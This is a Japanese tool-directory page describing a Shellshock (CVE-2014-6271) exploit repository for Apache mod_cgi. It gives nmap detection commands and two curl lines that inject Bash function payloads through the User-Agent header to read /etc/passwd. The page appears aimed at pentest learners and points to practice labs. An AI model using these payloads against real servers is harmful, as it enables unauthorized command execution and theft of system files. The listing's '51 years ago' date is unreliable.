Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2014-6271 — "Shellshock"脆弱性の悪用。mod_cgiを使用したApacheでのリモートコード実行。 | Kitploit
ツール/GitHubGitHub/j0hnth3kn1ght/cve-2014-6271
偵察脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHubj0hnth3kn1ght/cve-2014-6271

CVE-2014-6271

"Shellshock"脆弱性の悪用。mod_cgiを使用したApacheでのリモートコード実行。

リポジトリを見る
51年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Shellshock エクスプロイト (CVE-2014-6271)

Shellshock は実質的に BASH におけるリモートコマンド実行の脆弱性です。このスクリプトは、mod_cgi が有効な Apache または類似の Web 環境で脆弱性を悪用します。脆弱性は環境変数の操作にあり、環境変数はコンピュータ上のプロセスがどのように実行されるかに影響を与える動的な名前付きの値です。攻撃者は悪意のあるコードを環境変数に付加することでこれを悪用し、変数を受信するとコードが実行されます。これにより攻撃者はシステムを危険にさらす可能性があります。

脆弱性テスト用ラボ

  • PentesterLab

  • VulnHub

  • TryHackMe

    Vídeo2

CGI-BIN ページを見つける:

root@kitploit:~
$ nmap 192.168.x.x --script=http-shellshock --script-args uri=/cgi-bin/admin.cgi
$ nmap -sV -p- --script http-shellshock 192.168.x.x
$ nmap -sV -p- --script http-shellshock --script-args uri=/cgi-bin/bin,cmd=ls 192.168.x.x

手動テスト:

root@kitploit:~
sudo curl -H "User-Agent: () { :; }; /bin/cat /etc/passwd" <WEBSERVER-IP>
sudo curl -A "() { :;}; echo Content-Type: text/html; echo; /bin/cat /etc/passwd;" <WEBSERVER-IP>

警告:

私は、このツールによって引き起こされる違法な使用や損害について一切の責任を負いません。これは楽しみのために書かれたものであり、悪意のためではありません。ハッキングとサイバーセキュリティに関する認識を高めることを目的としています。


良いハッキングを :)

ツールをダウンロード